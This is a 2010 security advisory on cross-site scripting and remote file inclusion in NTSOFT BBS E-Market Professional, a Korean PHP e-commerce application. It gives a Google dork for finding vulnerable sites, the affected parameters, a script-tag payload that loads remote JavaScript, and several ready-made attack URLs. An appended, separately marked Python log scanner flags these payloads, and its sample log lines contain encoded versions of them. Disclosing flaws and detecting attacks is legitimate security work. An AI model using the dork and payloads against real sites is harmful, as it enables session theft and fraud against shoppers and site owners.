NTSOFT BBS E-Market Professional Cross Site Scripting

Related Vulnerabilities: CVE-2009-3152  
Publish Date: 06 Jul 2010
Author: Ivan Sanchez
+================================================================================================+
+                 NTSOFT BBS E-Market Professional  & XSS and Remote Execution Evil code         +
+================================================================================================+


Author(s): Ivan Sanchez 

Product:   NTSOFT, All Right Reserved.

Vendor Overview: NTSOFT. (Korean ecommerce application)

Vendor Homepage: http://www.nt.co.kr/



Date: 03/07/2010


"most of all Korean sites that handle e-shop, e-banking, ... use this software"


Description:
------------

BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code, which is then executed on the vulnerable system.
The issue arises from improper validation of user-supplied data.




During 2009, I reported some bugs:
----------------------------------

http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt

http://www.securityfocus.com/bid/35893 

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152

http://xforce.iss.net/xforce/xfdb/52157

http://secunia.com/advisories/26117

http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html



GOOGLE DORKS:
------------

intext: "NTSOFT All rights reserved"



Parameters affected:
--------------------

2010:

pageurl=   evil.js
co_no=     evil.js
b_temcode= evil.js



2009:

page= evil.js
bt_code= evil.js
b_no= evil.js






Evil Code to put:
-----------------

Example:  "><script src=http://site/scripts/evil.js></script> 




Example URL affected:
---------------------


2009:

http://[TARGET]/becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code



2010:

http://TARGET/becommunity/community/index.php?pageurl=EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=EVIL_CODE&co_no=105580


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=EVIL_CODE&page=7&flg=3&co_no=105580
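Added, defender-side example (not part of this advisory): a small Python checker that pulls request URLs out of web-server access logs and flags the parameters listed above when they carry script-injection markers or non-numeric values, including the duplicated co_no trick shown in the example URLs. The parameter names and payload shape come from the advisory; the sample log lines are constructed and the pageurl allowlist is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Parameters named in the advisory that the application treats as numeric ids.
NUMERIC_PARAMS = {"co_no", "b_no", "bt_code", "b_temcode", "page", "flg"}
# Assumption for this example: only the route seen in the advisory URLs is legitimate.
ALLOWED_PAGEURL = {"board"}
# Markers of the "><script src=...></script> payload shape shown in the advisory.
PAYLOAD_RE = re.compile(r'(<\s*script|"\s*>|javascript:)', re.IGNORECASE)

def inspect_request(url: str) -> list[str]:
    """Return findings for one request URL (empty list = nothing suspicious)."""
    findings = []
    # parse_qs keeps repeated parameters, so a second co_no is inspected too.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; catch double-encoding too
            if PAYLOAD_RE.search(value):
                findings.append(f"payload marker in {name}")
            elif name in NUMERIC_PARAMS and not value.strip().isdigit():
                findings.append(f"non-numeric {name}={value!r}")
            elif name == "pageurl" and value not in ALLOWED_PAGEURL:
                findings.append(f"unexpected pageurl={value!r}")
    return findings

# Constructed sample access-log lines (Common Log Format): one benign, two hostile.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jul/2010:10:00:01 +0000] "GET /becommunity/community/index.php?pageurl=board&mode=view&b_no=5014&bt_code=17&page=1 HTTP/1.1" 200 4120
10.0.0.9 - - [03/Jul/2010:10:00:07 +0000] "GET /becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=%22%3E%3Cscript%20src%3Dhttp%3A%2F%2Fsite%2Fscripts%2Fevil.js%3E%3C%2Fscript%3E HTTP/1.1" 200 4210
10.0.0.9 - - [03/Jul/2010:10:00:09 +0000] "GET /becommunity/community/index.php?pageurl=%22%3E%3Cscript%20src%3D//site/evil.js%3E HTTP/1.1" 200 3980
"""

LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_log(text: str) -> dict[int, list[str]]:
    """Map 1-based log line numbers to findings for lines with suspicious requests."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if m:
            findings = inspect_request(m.group(1))
            if findings:
                hits[lineno] = findings
    return hits

if __name__ == "__main__":
    for lineno, findings in scan_log(SAMPLE_LOG).items():
        print(f"line {lineno}: {findings}")
```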





Thank you so much! Ivan,


NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
